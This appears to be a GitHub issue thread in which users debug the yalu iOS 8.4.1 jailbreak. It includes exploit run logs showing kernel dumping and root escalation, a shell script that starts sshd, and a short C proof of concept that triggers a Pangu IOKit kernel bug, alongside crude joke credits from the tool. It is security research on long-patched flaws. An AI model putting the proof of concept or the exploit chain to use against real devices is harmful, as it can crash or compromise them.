some steps don't work in the jb progress. Maybe extracting bootstarp.tar dones't really work?

[Izib]

First of all, I read all issues in yalu thead. i'm 90% sure I did exactly what it needs to do.

1. Edit sbin/reboot and chmod +x. The iOS 8.4.1 has launchctl, so i didn't put it in bootstrap(Of cuz, I tried to add launchctl in bootstrap). tar bootstrap with openssl & openssh, put it in yalu/data as bootstrap.tgz (I think the Cydia is not necessary. Actually, I guess the jb program doesn't touch extracting bootstrap file in my device)
2. run "bash run.sh", I got 6+ ret. It should be working now.

log in Mac shell:

2016-06-21 20:45:16.024 main[41602:2409808] 64 dyld!
0x30000000
2016-06-21 20:45:16.026 main[41602:2409808] cs_size = 530
2016-06-21 20:45:16.026 main[41602:2409808] proc'd
Generated exploit dylib
2016-06-21 20:45:18.106 main[41655:2409871] cs_size = 4e0
Generated exploit dylib
Copying files to device...
Uploaded 3454176 bytes to PhotoData/KimJongCracks/Library/PrivateFrameworks/GPUToolsCore.framework/GPUToolsCore
Uploaded 92912 bytes to drugs
Uploaded 10987520 bytes to PhotoData/KimJongCracks/bootstrap.tar
Uploaded 324288 bytes to PhotoData/KimJongCracks/tar
Tap on the jailbreak icon to crash the kernel (or 0wn it if you're in luck!)

log in kjc_jb.log:

yalubreak iso841 - Kim Jong Cracks Research
Credits:
qwertyoruiop - sb escape & codesign bypass & initial kernel exploit
panguteam: kernel vulns
windknown: kernel exploit & knows it's stuff
_Morpheus_: this guy knows stuff
jk9356: kim jong cracks anthem
JonSeals: crack rocks supply (w/ Frank & haifisch)
ih8sn0w: <3
posixninja: <3
xerub <3
its_not_herpes because thanks god it wasnt herpes
eric fuck off
Kim Jong Un for being Dear Leader.
RIP TTWJ / PYTECH / DISSIDENT
SHOUT OUT @ ALL THE OLD GANGSTAS STILL IN THE JB SCENE
HEROIN IS THE MEANING OF LIFE

BRITTA ROLL UP [no its not pythech!] 
[i] iomasterport: 0x0000070b / gasgauge user client: 0x0000050b
jk++
ret: 246c7000
ret: 00000000
found overlapping object
ret: 00000048
yalubreak iso841 - Kim Jong Cracks Research
Credits:
qwertyoruiop - sb escape & codesign bypass & initial kernel exploit
panguteam: kernel vulns
windknown: kernel exploit & knows it's stuff
_Morpheus_: this guy knows stuff
jk9356: kim jong cracks anthem
JonSeals: crack rocks supply (w/ Frank & haifisch)
ih8sn0w: <3
posixninja: <3
xerub <3
its_not_herpes because thanks god it wasnt herpes
eric fuck off
Kim Jong Un for being Dear Leader.
RIP TTWJ / PYTECH / DISSIDENT
SHOUT OUT @ ALL THE OLD GANGSTAS STILL IN THE JB SCENE
HEROIN IS THE MEANING OF LIFE

BRITTA ROLL UP [no its not pythech!] 
[i] iomasterport: 0x0000070b / gasgauge user client: 0x0000050b
jk++
ret: 246c7000
ret: 00000000
found overlapping object
found overlapped object
ret: ffffff80
ret: 87730800
ret: ffffff80
ret: 05bfc780
ret: 00000000
ret: 02c00000
ret: ffffff80
ret: 04c02000

1. execute " idevicediagnostics restart", let system restart and run "/sbin/reboot" to launch ssh.

But I scan the port 22, it's closed. openssh dones't work, back to check syslog by idevicesyslog, no info prints about sshd.

1. I doubt the "/sbin/reboot" doesn't work, then tried to add test info on the top of "/sbin/reboot"

#!/bin/sh
echo "var mobile test" >> /var/mobile/Media/izib_jb.log 
launchctl load /Library/LaunchDaemons/com.openssh.sshd.plist
exit 0

I am not sure which folder is the readable folder for ifunbox, also tried writing test info to izib_jb.log in /private/var/mobile/Media and /Media folder. After all of those tests, didn't see izib_jb.log in ifunbox.

1. I was thinking the "drugs" probably don't extract the bootstrap.tar correctly. Then checking syslog by idevicesyslog. it prints "uid: 0" and "Done extracting." looks like it works great.

Jun 21 20:46:06 zhangqing Unknown[200] <Warning>: yalu for ios841 arm64 untether by ~qwertyoruiop[kjc]
Jun 21 20:46:06 zhangqing Unknown[200] <Warning>: +420 swags @ windknown, comex, ih8sn0w, posixninja, _morpheus_, haifisch, jk9357, ttwj, kim jong un
Jun 21 20:46:06 zhangqing Unknown[200] <Warning>: -420 swags @ south (fake) korea, saurik, britta
Jun 21 20:46:06 zhangqing Unknown[200] <Warning>: Found overlapping object
Jun 21 20:46:06 zhangqing Unknown[200] <Warning>: Found overlapped object
Jun 21 20:46:06 zhangqing Unknown[200] <Warning>: Found overlapped object again
Jun 21 20:46:06 zhangqing Unknown[200] <Warning>: Partially dumping the kernel...
Jun 21 20:46:06 zhangqing Unknown[200] <Warning>: Kernel dumped.
Jun 21 20:46:06 zhangqing Unknown[200] <Warning>: Gaining code exec..
Jun 21 20:46:06 zhangqing Unknown[200] <Warning>: Doing a full kernel dump now..
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: Done!
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: str_w1_x2_ret: 0x00000000002dde58
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: kernel_pmap: 0x00000000004b6138
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: pmap_store: 0xffffff800513b900
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: pde_base: 0xffffff8005fd5000
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: physAddr: 0x000000000054c040
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: physBase: 0x0000000800e00000
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: virtBase: 0xffffff8004c00000
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: kv: 0x0000000000000000
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: kv: 0x0000000000001337
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: level2_base ffffff8005fd6000 level2_krnl ffffff8005fd6130
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: to patch block page table
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: to patch block page table
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: va: ffffff800525f000 idx: 3 level2: 8021d9003 level3_base: ffffff8005fd9000 pte_krnl: ffffff8005fd92f8
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: va: ffffff80050cc000 idx: 2 level2: 8021d8003 level3_base: ffffff8005fd8000 pte_krnl: ffffff8005fd8660
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: va: ffffff8005134000 idx: 2 level2: 8021d8003 level3_base: ffffff8005fd8000 pte_krnl: ffffff8005fd89a0
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: va: ffffff8005133000 idx: 2 level2: 8021d8003 level3_base: ffffff8005fd8000 pte_krnl: ffffff8005fd8998
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: va: ffffff8005b2a000 idx: 7 level2: 8021dd003 level3_base: ffffff8005fdd000 pte_krnl: ffffff8005fdd950
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: to patch page table
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: va: ffffff800582a000 idx: 6 level2: 8021dc003 level3_base: ffffff8005fdc000 pte_krnl: ffffff8005fdc150
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: to patch page table
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: kv: 0x00000000721e011f
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: kv: 0x0000000034000df5
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: kv: 0x00000000f10003df
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: kv: 0x00000000d503201f
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: uid: 501
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: uid: 0
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: Found overlapped object again
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: Cleaning the mess.. 
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: Remounting / as read/write 0 No such process
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: Installing loader.
Jun 21 20:46:09 zhangqing Unknown[200] <Warning>: Beginning extraction.
Jun 21 20:46:10 zhangqing Unknown[200] <Warning>: Done extracting.
Jun 21 20:46:10 zhangqing Unknown[200] <Warning>: Done installing loader.
Jun 21 20:46:10 zhangqing Unknown[200] <Warning>: alive?!

1. As @kpwn mentioned that the bootstrap.tar will be extracted in "/", I tar a new file named izib_jb.log in bootstrap.tar with path: var/mobile/Media/izib_jb.log, just double check if the bootstrap.tar extracts successfully. After getting 6+ ret and "Done extracting" in kjc_jb.log and syslog, there doesn't have izib_jb.log.
2. Back to check the code, it looks like the drugs(untether.m) extracting the file, I tried to add debug info in untether.m file, but it cannot be compiled.
3. Okay, it's a dead corner for me.

@kpwn sorry, it's a long story, I just want to know is some way to continue debugging the issue. I was thinking there must be some way to check it while you are doing the jb work.

[in7egral]

Hi lzib!

I see you have passed untether stage - "alive?!". So, could you please write here your iPhone/iPad model?

About your question 2: You can't compile untether without sources of patchfinder_64.c (it's my name of this file, I reverse-engineered it), but it's private (owner is the Pangu team). Another problem is defines for IOKit - xnuexp.h. It's easy to restore. Just locate structures and prototypes of unknown functions in the Apple Opensource or from old headers of IOKit.

[Izib]

Thank you for your comment. Model is iphone 6(A1586)

What does the "alive?!" mean? do you have the "yalu" work on you device?

[in7egral]

No, I rewrote the dyldmagic app (cause it's hardcoded for the iPhone 6 (I beleive) kernel offsets to by-pass codesign). So, it generates a stable version of magic.dylib w/o a GasGauge exploit (user level codesign by-pass with csbypass method). But I can't get untether working on my iOS 8.4.1 runned on iPhone 5s 64Gb. The untether crashes at stage of kernel dumping. The "Doing a full kernel dump now.." message is last in my log and I get blue screen every tap of the jailbreak app. I am fighting with that problem yet.

The "alive?!" means, that kernel is probably dumped, gadgets were found and kernel was patched. The main goal of jailbreak process is to patch the kernel (turn off sandbox, codesign, memory protection and other features to allow any app w/o valid code signature (read the Apple native signature, not developer certificate signature) to be runned outside of sandbox with root rights).

So, my next question is it is stable for you? Are you get log message with "alive?!" every time or with some random taps?

[kpwn]

The ROP-ified version of the exploit is unstable, with a pretty low success rate. On the other hand, the untether itself was in my experience pretty reliable.

[in7egral]

@kpwn you mean stable on iPhone 6, or you tested 5/5s also?

[kpwn]

I only tested on an iPhone 6. I've never really had a 5s 8.4.1 until very recently, and since dyldmagic won't work on it I have no way to test. (except fixing it but I have no time for it right now)

[Izib]

@progopis I know "Alive?!" means patch working on the code-side. if it really works, why it doesn't extracting my file. As my post mentioned, I add var/mobile/Media/izib_jb.log to test if it untar the file. I was thinking there's some thing wrong on my device and the code doesn't print any exception log. That's why I wanna recompile the untether.

You question: I changed the "run.sh", the new "run.sh" is about 70% chance to get 6+ ret and "alive?!" on my device.

[Izib]

@progopis BTW: I tried decompiling the patchfinder_64 from untether(I estimate that needs too much time). I chose to patch the untether bin to add logs. That makes it very unstable, I haven't got one success "alive?!" in my tests. I was stucked... I might have to RE the patchfinder_64 file.

[kpwn]

If I remember correctly, untether has full symbols. You may link against those, but it requires patching the untether mach-o.

[in7egral]

@Izib could you check please last version on iPhone 6?

[Izib]

@progopis 8.4.1(12H321)

[in7egral]

@Izib, thanks but I mean last version of yalu after last commit.

[Izib]

I am working on commit 9a682f393f41b912333add22f5af9d5d7464ca17

commit 9a682f393f41b912333add22f5af9d5d7464ca17
Merge: 604a5ea 7d3115d
Author: kpwn <i_are@qwertyoruiop.com>
Date:   Tue Dec 1 09:45:38 2015 +0100

    Merge pull request #37 from qfdk/master

    fix the zcat in run.sh

I also tried the commit 5668b58d061ee2e3261aa57139090dc68c0fdafd (That's merged from you)

commit 5668b58d061ee2e3261aa57139090dc68c0fdafd
Merge: 9562a33 1624860
Author: kpwn <i_are@qwertyoruiop.com>
Date:   Sun Jun 26 23:26:15 2016 +0200

    Merge pull request #45 from FriedAppleTeam/master

    It’s a merged commit of FriedApple Team.

and then I cannot reach "Alive?!". Always crashed after "Kernel dumped".

Jun 28 00:19:26 zhangqing drugs[195] <Warning>: Smoke Britta Erry Day
Jun 28 00:19:26 zhangqing drugs[195] <Warning>: yalu for ios841 arm64 untether by ~qwertyoruiop[kjc]
Jun 28 00:19:26 zhangqing drugs[195] <Warning>: +420 swags @ windknown, comex, ih8sn0w, posixninja, _morpheus_, haifisch, jk9357, ttwj, kim jong un
Jun 28 00:19:26 zhangqing drugs[195] <Warning>: -420 swags @ south (fake) korea, saurik, britta
Jun 28 00:19:26 zhangqing drugs[195] <Warning>: Found overlapping object
Jun 28 00:19:26 zhangqing drugs[195] <Warning>: Found overlapped object
Jun 28 00:19:26 zhangqing drugs[195] <Warning>: Found overlapped object again
Jun 28 00:19:26 zhangqing drugs[195] <Warning>: Partially dumping the kernel...
Jun 28 00:19:26 zhangqing drugs[195] <Warning>: Kernel dumped.
[disconnected]

[kpwn]

Nice, it looks like the loader works and the untether too, to a certain extent.

So, I can probably find the time to write up a new, better untether. I guess.

[in7egral]

@Izib For me, too. I also have a crash after "Kernel dumped.". We have a new kernel dumper, more stable, and it can reach even "Doing a full kernel dump now..", "Done!". I beleive the problem with untether that we were forced to make it 32 bit and/or killed fork(). We can not load 64 bit binaries with current loader (due to AMFI was not patched in the kernel and loader is 32 bit itself). So, I suppose the final stable solution is almost ready.

Btw, I tried to reproduce Pangu exploits on 64 bit device, and here is POC for panic2, it works on both 32 bit and 64 bit versions:

void panic2(io_connect_t connection)
{
    vm_address_t address = 0;
    vm_size_t vmsize = 4096;
    kern_return_t kr = IOConnectMapMemory(connection, 0, mach_task_self(), &address, &vmsize, kIOMapAnywhere);
    if (kr != KERN_SUCCESS || vmsize != 4096) {
        return;
    }
    size_t size;
    cpu_type_t type;
    size = sizeof(type);
    sysctlbyname("hw.cputype", &type, &size, NULL, 0);

    if (type == CPU_TYPE_ARM64) {
        // ARM 64-bit CPU
        NSLog(@"it's a 64 bit");
        *(uint32_t *)(address + 24) = 0xAAAAAAA;
        *(uint32_t *)(address + 28) = 0;  // change 169 to 0
    } else if (type == CPU_TYPE_ARM) {
        // ARM 32-bit CPU
        NSLog(@"it's a 32 bit");
        *(uint32_t *)(address + 16) = 0xAAAAAAA;
        *(uint32_t *)(address + 20) = 0;  // change 339 to 0
    } else {
        NSLog(@"it's unknown");
        return;
    }

    IOConnectCallMethod(connection, 14, NULL, 0, NULL, 0, NULL, NULL, NULL, NULL);
}

I don't know is it usable for untether.

[kpwn]

The heap overflow used by Yalu is pretty easy as heap overflow. I can recompile the untether for armv7.

[Izib]

I patched untether and make it work now. (After reboot hundred times, my device is unstable and only 1/5 chance to patch successfully) Meanwhile something is broken, I cannnot use "idevicediagnostics restart" on my device :(

Jun 28 13:00:19 iPhone com.apple.MobileSoftwareUpdate.UpdateBrainService[199] <Notice>: 0050c000 : Verifying the package contents
Jun 28 13:00:24 iPhone com.apple.xpc.launchd[1] (lockdown.17261501381.com.apple.mobile.diagnostics_relay[207]) <Warning>: Service exited with abnormal code: 1

This error is not the problem of yalu code any more, I will close this issue. thanx @progopis @kpwn